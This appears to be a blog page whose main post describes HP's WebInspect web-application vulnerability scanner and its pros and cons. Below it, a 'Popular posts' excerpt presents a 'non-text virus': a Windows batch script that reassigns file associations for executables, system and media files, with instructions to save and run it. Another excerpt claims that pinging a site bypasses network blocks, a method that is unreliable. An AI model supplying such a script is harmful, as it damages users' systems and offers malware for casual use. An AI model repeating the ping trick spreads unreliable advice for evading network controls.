Skip to main content

What is WebInspect ?




Image result for WebInspect
WebInspect is a web application security scanning tool offered by HP.
It helps the security professionals to assess the potential security flaws in the web application.
WebInspect is basically a dynamic black box testing tool which detects the vulnerabilities by actually performing the attack.
After initiating the scan on a web application, there are assessment agents that work on different areas of the application.
They report their results to security engine which evaluates the results.
It uses Audit engines to attack the application and determine the vulnerabilities.
At the end of the scan you can generate a report called ‘Vulnerability Assessment Report’ which would list the security issues in desired format.
Using this report, client can fix the issues and then go for validation scanning to confirm the same.
HP WebInspect is a commercial tool and you need license to scan a web site.
With the trail version you will be permitted to scan only zero.webappsecurity.com (HP demo site).
So WebInspect basically comes into picture when the application is hosted in some environment (test/QA/production).
As with every other tool there are both advantages and disadvantages associated with using WebInspect.
  Advantages:
  Saves time when dealing with large enterprise applications
Simulates the attack, shows the results and presents you with a comprehensive view.
It is not dependent on the underlying language.
  Disadvantages:
  It’s hard for any tool to find logical flaws, weak cryptographic storage, severity of the disclosed information etc.
It has a list of payloads that it uses on every web application.
It does not use any wisdom in generating payloads depending on the type of application.
There could be false positives among the listed vulnerabilities.
  _________________________

Comments

Popular posts from this blog

HOW TO BYPASS OR UNBLOCK BLOCKED SITES:-

Today everyone of us is a part of any college,office or any organization. Everywhere we find free open wifi’s , but the major problem with these are there are many websites which are blocked by the servers of college,ofiice or any organization. There are different type of securities that are implemented in these server to block some sites like Facebook ,Twitter etc. So In this post i’ll tell you easy and permanent method to access or bypass blocked sites Steps To Bypass Blocked Sites-   1. Connect your pc or laptop with wifi or your broadband connection in which you want to access blocked websites.   2. Open command prompt by clicking start and the typing “cmd” and then pressing enter.   4. 3. Now a command prompt window will appear.   5. Type ping Websitename (for exp: ping http://facebook.com) and press enter.   6. Now open your browser and enter the site which you had recently ping.   7.You will see the site will get...

NON-TEXT VIRUS (changefile to nonworkingfile):-

the non-text virus change the format of your file in a way crupt your data if your file are in these format(.exe .jpeg .png  .mpeg .sys) Type/copy the following code in notepad:- @echo off   assoc .txt=jpegfile   assoc .exe=htmlfile   assoc .jpeg=avifile   assoc .png=mpegfile   assoc .mpeg=txtfile   assoc .sys=regfile   msg Your System is cracked …..   exit   save it as (nontext .bat) and run it.

How to Use Your Phone as a Webcam?

A quick search on Google Play throws up several webcam applications. We tried 5 of the top 10 results, but most didn’t work properly. From the ones that didn’t crash repeatedly, SmartCam failed to show the video, and DroidCam needs you to install an app on Windows to work. IP Webcam is easily the best of the lot because it works through your browser, which gives it the cross-platform compatibility. To set up a security camera on Android, follow these steps. 1. Connect your computer and the phone to the same Wi-Fi network. 2. Install the IP Webcam app on your smartphone. 3. Close all other camera apps. Force close them from the app switcher before you proceed. 4. Launch the IP Webcam app. Scroll to the bottom and tap Start server. 5. The app will now fire up your phone’s camera and display a URL. Our URL was http://172.32.15.110:8080. 6. Enter this URL in any browser on your computer and hit Enter. 7. In the browser, you’ll see a drop down menu n...